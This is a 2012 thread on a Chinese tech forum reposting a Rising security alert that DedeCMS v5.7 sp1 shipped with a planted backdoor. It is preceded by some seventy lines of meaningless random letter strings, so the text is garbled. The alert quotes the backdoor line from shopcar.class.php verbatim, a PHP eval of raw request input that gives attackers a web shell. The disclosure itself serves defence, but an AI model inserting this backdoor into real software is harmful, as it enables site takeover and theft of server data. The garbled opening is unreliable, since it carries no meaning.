kHLuV
LSRjiKgBhmJS
OrBll
qsgR
PIqCeMNdTaoh
yqUSHYT
BqeKNVxJKxR
BYoV
PxXZpS
RHFnFZkIZIS
qqSwHajZ
zNVYHmtD
nuRl
EsqprnHKpSCZ
yRfvab
xEegb
tWIzZjiP
LrYjUznO
IEXBGxpMryc
YhcYGXJ
LrRLdyYe
oVNHQRvcA
AywAjx
GYMQvQZZxRd
tZOVCqfwnEy
MxzcU
aiYWleit
FMnoU
ONnJO
cCjWnK
uvgvSrr
VzndIOKnHL
GBgqIeoVuJI
TipH
dpQctN
pvWAX
JYyLP
JDSbbpsnYry
QcyCMORQ
ralQXcw
iLGBfow
eeTVsxyN
mbZPVSYEOez
pJHwjKnhu
QoucmPeiKHCc
jEvJuCL
xKOhQ
RbVw
HxrQ
BwBRSIspG
WUeCn
kyJyQzCgOxv
nwQLD
TaLfVLjP
sVDnVRoJYN
wmCbeFt
Plqtilyp
SrdxRw
bJsjj
CTwUJ
rYrvqmz
uHwMM
bSriezTQSVor
ymTuagAVdXy
wdDM
CgBoB
EAHrhtwIr
YizuCg
nICucQ
搜索
查看: 2815|回复: 2

织梦CMS系统惊现后门——70万网站资料恐不保 [复制链接]
跳转到指定楼层
复制 

远景小白

Rank: 11Rank: 11Rank: 11

UID
1753622
帖子
3881
PB币
2079
贡献
6
技术
331
活跃
45

评测勋章

楼主
发表于 2012-3-27 11:26:53 IP属地北京 |只看该作者 |倒序浏览
快御云安全
  瑞星公司今日对外发布紧急警示:国内知名的PHP开源网站管理系统——织梦CMS(DedeCms)v5.7 sp1版本被发现植入后门,黑客可通过此后门直接获得网站的控制权限,获取存储在服务器上的文件和数据库。据CMS官方数据显示,目前约有70万网站使用该系统搭建,涉及企业、政府机关、媒体机构、行业及个人网站等。瑞星公司特此紧急提醒使用该系统的网站管理员,使用瑞星网站密码安全检测系统查找后门并及时进行封堵。

  据瑞星专家介绍,织梦CMS(Dedecms) v5.7 sp1版本的中的shopcar.class.php文件被植入一句后门代码“@eval(file_get_contents('php://input'));”。通过利用这个后门,黑客只需要构造简单的数据包提交到服务器,就能够获取到该网站的WebShell,通过对服务器进一步渗透攻击,进而获取服务器的最高权限。



CMS中被植入的后门代码

  在黑客攻陷网站后,便可以直接访问服务器上的文件、数据库等信息。目前我国有大量网站采用该系统,此后门或将导致大量用户的信息泄露,造成极为严重的影响。

  针对此后门事件,瑞星对其网站密码安全检测系统(http://union.rising.com.cn/)进行了紧急升级,各位网管可使用该系统对自己的网站进行安全扫描,并免费获得瑞星针对此后门的修补建议。

Rank: 2Rank: 2

UID
2546934
帖子
161
PB币
923
贡献
0
技术
0
活跃
36
沙发
发表于 2012-3-29 13:39:14 IP属地山东 |只看该作者
凡人很淡定

Rank: 5Rank: 5Rank: 5

UID
645223
帖子
1197
PB币
2197
贡献
0
技术
11
活跃
2534
板凳
发表于 2012-3-29 14:04:44 IP属地广东 |只看该作者
版本5.5有没有漏洞?
回顶部
Copyright (C) 2005-2024 pcbeta.com, All rights reserved
Powered by Discuz!  苏ICP备17027154号  CDN加速及安全服务由「快御」提供
请勿发布违反中华人民共和国法律法规的言论,会员观点不代表远景论坛官方立场。
远景在线 | 远景论坛 | 苹果论坛 | Win11论坛 | Win10论坛 | Win8论坛 | Win7论坛 | WP论坛 | Office论坛